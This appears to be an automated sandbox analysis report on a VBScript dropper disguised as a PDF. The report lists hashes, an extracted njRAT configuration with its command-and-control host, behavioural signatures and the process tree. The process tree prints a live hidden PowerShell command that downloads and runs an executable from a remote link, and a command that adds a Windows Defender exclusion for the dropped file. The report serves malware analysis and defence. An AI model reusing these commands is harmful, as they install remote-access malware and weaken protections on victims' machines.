Analysis
-
max time kernel
144s -
max time network
151s -
platform
windows7_x64 -
resource
win7-en -
submitted
15-09-2021 13:02
Static task
static1
Behavioral task
behavioral1
Sample
Documentacion.PDF.vbs
Resource
win7-en
General
-
Target
Documentacion.PDF.vbs
-
Size
162KB
-
MD5
16dd6afc5e63f4edc4f35fd1176e63bd
-
SHA1
d64a9461b703119695e76f880832924d487a648a
-
SHA256
c34173dfa5a1a842bb14ef1fddd8f15b0998577740469b6987d138e165786994
-
SHA512
3e2abe804b90ec51e1a7fb4145a0b11304e3d279c13cc3f65380721c079fb1b9711bb491e92b5e95c6ca957aeb7bfed9b33b030c094a1dcc3d4ebcab577b8df3
Malware Config
Extracted
https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04
Extracted
njrat
0.7NC
NYAN CAT
pedrobedoya2021.duckdns.org:1980
cf13c225ff474d45b
-
reg_key
cf13c225ff474d45b
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 9 1728 powershell.exe 11 1728 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
Hostdyn.exeHostdyn.exepid process 920 Hostdyn.exe 1632 Hostdyn.exe -
Drops startup file 2 IoCs
Processes:
WScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Documentacion.PDF.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Documentacion.PDF.vbs WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Hostdyn.exedescription pid process target process PID 920 set thread context of 1632 920 Hostdyn.exe Hostdyn.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1728 powershell.exe 1728 powershell.exe 1728 powershell.exe 1696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
powershell.exepowershell.exeHostdyn.exedescription pid process Token: SeDebugPrivilege 1728 powershell.exe Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 1632 Hostdyn.exe Token: 33 1632 Hostdyn.exe Token: SeIncBasePriorityPrivilege 1632 Hostdyn.exe Token: 33 1632 Hostdyn.exe Token: SeIncBasePriorityPrivilege 1632 Hostdyn.exe Token: 33 1632 Hostdyn.exe Token: SeIncBasePriorityPrivilege 1632 Hostdyn.exe Token: 33 1632 Hostdyn.exe Token: SeIncBasePriorityPrivilege 1632 Hostdyn.exe Token: 33 1632 Hostdyn.exe Token: SeIncBasePriorityPrivilege 1632 Hostdyn.exe Token: 33 1632 Hostdyn.exe Token: SeIncBasePriorityPrivilege 1632 Hostdyn.exe Token: 33 1632 Hostdyn.exe Token: SeIncBasePriorityPrivilege 1632 Hostdyn.exe Token: 33 1632 Hostdyn.exe Token: SeIncBasePriorityPrivilege 1632 Hostdyn.exe Token: 33 1632 Hostdyn.exe Token: SeIncBasePriorityPrivilege 1632 Hostdyn.exe Token: 33 1632 Hostdyn.exe Token: SeIncBasePriorityPrivilege 1632 Hostdyn.exe Token: 33 1632 Hostdyn.exe Token: SeIncBasePriorityPrivilege 1632 Hostdyn.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WScript.exepowershell.exeHostdyn.exedescription pid process target process PID 1316 wrote to memory of 1728 1316 WScript.exe powershell.exe PID 1316 wrote to memory of 1728 1316 WScript.exe powershell.exe PID 1316 wrote to memory of 1728 1316 WScript.exe powershell.exe PID 1728 wrote to memory of 920 1728 powershell.exe Hostdyn.exe PID 1728 wrote to memory of 920 1728 powershell.exe Hostdyn.exe PID 1728 wrote to memory of 920 1728 powershell.exe Hostdyn.exe PID 1728 wrote to memory of 920 1728 powershell.exe Hostdyn.exe PID 920 wrote to memory of 1696 920 Hostdyn.exe powershell.exe PID 920 wrote to memory of 1696 920 Hostdyn.exe powershell.exe PID 920 wrote to memory of 1696 920 Hostdyn.exe powershell.exe PID 920 wrote to memory of 1696 920 Hostdyn.exe powershell.exe PID 920 wrote to memory of 1632 920 Hostdyn.exe Hostdyn.exe PID 920 wrote to memory of 1632 920 Hostdyn.exe Hostdyn.exe PID 920 wrote to memory of 1632 920 Hostdyn.exe Hostdyn.exe PID 920 wrote to memory of 1632 920 Hostdyn.exe Hostdyn.exe PID 920 wrote to memory of 1632 920 Hostdyn.exe Hostdyn.exe PID 920 wrote to memory of 1632 920 Hostdyn.exe Hostdyn.exe PID 920 wrote to memory of 1632 920 Hostdyn.exe Hostdyn.exe PID 920 wrote to memory of 1632 920 Hostdyn.exe Hostdyn.exe PID 920 wrote to memory of 1632 920 Hostdyn.exe Hostdyn.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Documentacion.PDF.vbs"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04' ) -encoding byte -Path $env:appdata\Hostdyn.exe; Start-Process $env:appdata\Hostdyn.exe"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Users\Admin\AppData\Roaming\Hostdyn.exe"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Users\Admin\AppData\Roaming\Hostdyn.exe"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1632
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
857aff9992a47764185c61da2493c753
SHA16efa34cd3fdb299fcd940c0719d3a172bac83164
SHA256b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155
SHA512fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a
-
MD5
857aff9992a47764185c61da2493c753
SHA16efa34cd3fdb299fcd940c0719d3a172bac83164
SHA256b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155
SHA512fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a
-
MD5
857aff9992a47764185c61da2493c753
SHA16efa34cd3fdb299fcd940c0719d3a172bac83164
SHA256b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155
SHA512fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a